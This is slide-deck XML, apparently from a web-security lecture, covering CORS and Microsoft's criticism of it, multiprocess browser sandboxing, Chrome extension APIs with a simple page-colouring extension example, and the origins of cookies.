          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS argues that CORS abuses ambient authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Claims it is rare that cross-domain data must be tailored based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the origin of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e. most sites deny all cross domain XHR or respond with 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Access-Control-Allow-Origin: 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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk of leaking sensitive info outweighs benefits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has pushed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XDomainRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as a counterproposal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Susceptible to header injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can use CORS to inject custom headers in cross-domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XHRs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Architecture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Separation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hulk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1994: Cookies introduced in Mosaic Netscape 0.9beta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Originally developed at the behest of MCI for an e-commerce application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wanted an improved mechanism for access control vs. HTTP Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies allow the server to set some state on the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>State is reflected back to the server in every HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17837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Architecture, Revisited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07968"/>
            <a:ext cx="4976433" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modern browsers are extremely complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple tabs from multiple origins executing concurrently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensive JS APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Complicated markup and CSS standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plugins, audio, and video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Potentially exploitable) bugs may exist in any component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Elbow Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="1"/>
            <a:endCxn id="46" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7221698" y="3488749"/>
            <a:ext cx="1258155" cy="1549783"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 37639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2" idx="1"/>
            <a:endCxn id="37" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="8287020" y="2679801"/>
            <a:ext cx="902970" cy="1357702"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26005"/>
              <a:gd name="adj2" fmla="val 8386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14239" y="2419604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Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Model and Renderer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8287020" y="2419604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HTML Parser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 rot="5400000">
            <a:off x="10572412" y="3234382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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="32" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10092960" y="2679801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478050" y="229298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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Elbow Connector 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7446740" y="2679801"/>
            <a:ext cx="840280" cy="548752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287020" y="4037503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CSS Parser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8479852" y="3228553"/>
            <a:ext cx="142085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JS Runtime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9900702" y="3475896"/>
            <a:ext cx="1613108" cy="89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652634" y="310656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JS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092960" y="4325678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575690" y="3947409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CSS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401481" y="2939998"/>
            <a:ext cx="287" cy="2885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7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7425844" y="3794450"/>
            <a:ext cx="861177" cy="50325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1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7427171" y="3488750"/>
            <a:ext cx="1052681" cy="8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Magnetic Disk 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218384" y="4596884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47" name="Elbow Connector 46"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9107208" y="2672387"/>
            <a:ext cx="712150" cy="44831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61145" y="489362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Cookies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8994667" y="2935179"/>
            <a:ext cx="5556" cy="28764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494324" y="3748947"/>
            <a:ext cx="287" cy="2885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~2008, browsers were typically monolithic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser ran a single renderer, HTML parser, JS runtime, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All pages shared the same underlying resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Originally, this was not a problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically, only one page open at a given time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No tabbing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Multitabbing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fundamentally changed the nature of browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: no ‘process’ separation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If one page hung, the whole browser would hang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If one page crashed, the whole browser would crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploiting one page would compromise the entire browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All private data exposed; arbitrary code execution with browser’s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Multiprocessing originally used by IE 4, revived by Chrome in 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resources for each origin are sandboxed within a OS-level process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each process contains its own DOM, parsers, and JS runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extensions and plugins are also run in separate processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tab processes are run with low or no privileges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filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No access to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tab processes use IPC to access APIs provided by the browser core</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Core implements APIs for storage, network, and screen access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Today, all major browsers use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>multiprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Architecture Example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8001548" y="1063296"/>
            <a:ext cx="3004457" cy="1741715"/>
            <a:chOff x="7358742" y="1321813"/>
            <a:chExt cx="3004457" cy="1741715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="1321813"/>
              <a:ext cx="3004457" cy="174171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www.google.com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03787" y="1800650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 Parser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03787" y="2627530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CSS Parser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03787" y="2218773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JS Runtime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01811" y="1800649"/>
              <a:ext cx="1147665" cy="118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DOM and Renderer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01547" y="2913853"/>
            <a:ext cx="3004457" cy="1741715"/>
            <a:chOff x="7358742" y="3215927"/>
            <a:chExt cx="3004457" cy="1741715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="3215927"/>
              <a:ext cx="3004457" cy="174171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www.facebook.com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03787" y="369476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 Parser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03787" y="452164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CSS Parser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03787" y="4112887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JS Runtime</a:t>
              </a:r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01811" y="3694763"/>
              <a:ext cx="1147665" cy="118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DOM and Renderer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01546" y="5489488"/>
            <a:ext cx="3004457" cy="1228554"/>
            <a:chOff x="7358742" y="5110042"/>
            <a:chExt cx="3004457" cy="1228554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rounded Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="5110042"/>
              <a:ext cx="3004457" cy="1228554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Adobe Flash</a:t>
              </a:r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856" y="5549823"/>
              <a:ext cx="708686" cy="70868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124260" y="2175230"/>
            <a:ext cx="4769575" cy="2520735"/>
            <a:chOff x="477338" y="2218773"/>
            <a:chExt cx="4769575" cy="2520735"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rounded Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="477338" y="2405273"/>
              <a:ext cx="4769575" cy="233423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Browser Core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69781" y="3877429"/>
              <a:ext cx="1171111" cy="755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Screen Renderer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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69781" y="3045474"/>
              <a:ext cx="1776764" cy="763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Security Policy Enforcement</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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23193" y="3877429"/>
              <a:ext cx="1592546" cy="755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Network Management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1056" y="3045653"/>
              <a:ext cx="1589316" cy="763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Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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1056" y="3870969"/>
              <a:ext cx="1589316" cy="762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Storage Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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32675" y="3045474"/>
              <a:ext cx="983064" cy="763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IPC</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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355" y="2218773"/>
              <a:ext cx="747017" cy="747017"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Left-Right Arrow 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20045718">
            <a:off x="6032575" y="2362722"/>
            <a:ext cx="1845107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 rot="387808">
            <a:off x="6079657" y="3494941"/>
            <a:ext cx="1845107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2227777">
            <a:off x="5843793" y="4574741"/>
            <a:ext cx="2122803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5400000">
            <a:off x="9127211" y="4820804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18917" y="1300878"/>
            <a:ext cx="1569715" cy="1569715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Flowchart: Magnetic Disk 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550979" y="5489501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4" name="Left-Right Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1676072" y="4776272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-Right Arrow 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4589825" y="4798538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364676" y="5468972"/>
            <a:ext cx="119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29" y="105747"/>
            <a:ext cx="10097358" cy="6691021"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20291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Separation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Multiprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> architecture is a natural evolution in browser design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OSes use process boundaries to enforce security restrictions and improve reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The same logic holds for web browsers, which are now app platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dramatically improves security and stability of browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, multiprocessing is not a panacea for security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plugins still execute with enhanced privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser core offers a large number of APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> large surface for jailbreaks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8"/>
            <a:ext cx="10881049" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many browsers offer extension frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow users to add customization and features to their browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Created by third-party developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implemented using standard web components (Chrome, Firefox, Safari)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML, CSS, and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Granted access to privileged JS APIs not available to typical web pages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-3750"/>
            <a:ext cx="10961914" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chrome Extension Architecture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020208" y="2947266"/>
            <a:ext cx="3004457" cy="1741715"/>
            <a:chOff x="7358742" y="3215927"/>
            <a:chExt cx="3004457" cy="1741715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="3215927"/>
              <a:ext cx="3004457" cy="174171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www.facebook.com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03787" y="369476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 Parser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03787" y="452164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CSS Parser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03787" y="4112887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JS Runtime</a:t>
              </a:r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01811" y="3694763"/>
              <a:ext cx="1147665" cy="118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DOM and Renderer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20207" y="5522901"/>
            <a:ext cx="3004457" cy="1228554"/>
            <a:chOff x="7358742" y="5110042"/>
            <a:chExt cx="3004457" cy="1228554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rounded Rectangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="5110042"/>
              <a:ext cx="3004457" cy="1228554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Adobe Flash</a:t>
              </a:r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856" y="5549823"/>
              <a:ext cx="708686" cy="70868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142921" y="2208643"/>
            <a:ext cx="4769575" cy="2520735"/>
            <a:chOff x="477338" y="2218773"/>
            <a:chExt cx="4769575" cy="2520735"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rounded Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="477338" y="2405273"/>
              <a:ext cx="4769575" cy="233423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Browser Core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69781" y="3877429"/>
              <a:ext cx="1171111" cy="755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Screen Renderer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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69781" y="3045474"/>
              <a:ext cx="1776764" cy="763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Security Policy Enforcement</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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23193" y="3877429"/>
              <a:ext cx="1592546" cy="755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Network Management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1056" y="3045653"/>
              <a:ext cx="1589316" cy="763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Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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1056" y="3870969"/>
              <a:ext cx="1589316" cy="762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Storage Management</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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32675" y="3045474"/>
              <a:ext cx="983064" cy="763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IPC</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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355" y="2218773"/>
              <a:ext cx="747017" cy="747017"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Left-Right Arrow 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19322602">
            <a:off x="5880747" y="2173244"/>
            <a:ext cx="2277632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 rot="387808">
            <a:off x="6098318" y="3528354"/>
            <a:ext cx="1845107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2227777">
            <a:off x="5862454" y="4608154"/>
            <a:ext cx="2122803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5400000">
            <a:off x="9145872" y="4831951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agnetic Disk 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1569640" y="5522914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4" name="Left-Right Arrow 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1694733" y="4809685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-Right Arrow 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4608486" y="4831951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383337" y="5502385"/>
            <a:ext cx="119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8035083" y="320703"/>
            <a:ext cx="3004457" cy="1741715"/>
            <a:chOff x="7358742" y="3215927"/>
            <a:chExt cx="3004457" cy="1741715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rounded Rectangle 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7358742" y="3215927"/>
              <a:ext cx="3004457" cy="1741715"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 55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Adblock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03787" y="369476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 Parser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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703787" y="4521644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CSS Parser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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703787" y="4112887"/>
              <a:ext cx="1528784" cy="3579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JS Runtime</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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01811" y="3694763"/>
              <a:ext cx="1147665" cy="118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DOM and Renderer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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86" y="-3750"/>
            <a:ext cx="800061" cy="800061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Left-Right Arrow 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9145872" y="2287648"/>
            <a:ext cx="753126" cy="503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62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Extension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under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.* object in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bookmarks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cookies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downloads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history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – access and modify the user’s state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omnibox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tabs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window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – access and control the browser’s state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storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – sandboxed access to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browserAction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contextMenus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pageAction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– add buttons and menu items to the browser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webRequest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– observe and modify in-flight network requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to implement things like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Adblock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mechanism for extensions to inject arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> into web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>API for injected code to communicate with the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Extension Example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9666" y="2185613"/>
            <a:ext cx="499122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</a:rPr>
              <a:t>#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</a:rPr>
              <a:t>manifest.json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{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"name": "Page Redder",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	"description": "Make the current page red",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"version": "2.0",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"permissions": [ "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activeTab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 ],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"background":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lang="en-US" altLang="en-US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"scripts": ["background.js"], 			"persistent":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browser_action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":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lang="en-US" altLang="en-US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default_title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": "Make this page red"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},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manifest_version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": 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}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74632" y="2185613"/>
            <a:ext cx="66173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</a:rPr>
              <a:t>// background.js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</a:rPr>
              <a:t>// Called when the user clicks on the browser action.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chrome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.browserAction.onClicked.addListener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function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(tab)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34" charset="-128"/>
              </a:rPr>
              <a:t>// No tabs or host permissions needed!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console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.log(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'Turning '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+ tab.url +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' red!'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chrome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.tabs.executeScript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({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code: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document.body.style.backgroundColor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="red"'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431925" algn="l"/>
                <a:tab pos="1828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});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Cookies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152" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Cookies are a basic mechanism for persistent state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="606304" lvl="1" indent="-303152" defTabSz="398428">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2182" dirty="0"/>
              <a:t>Allows services to store a small amount of data at the client (usually ~4K)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="606304" lvl="1" indent="-303152" defTabSz="398428">
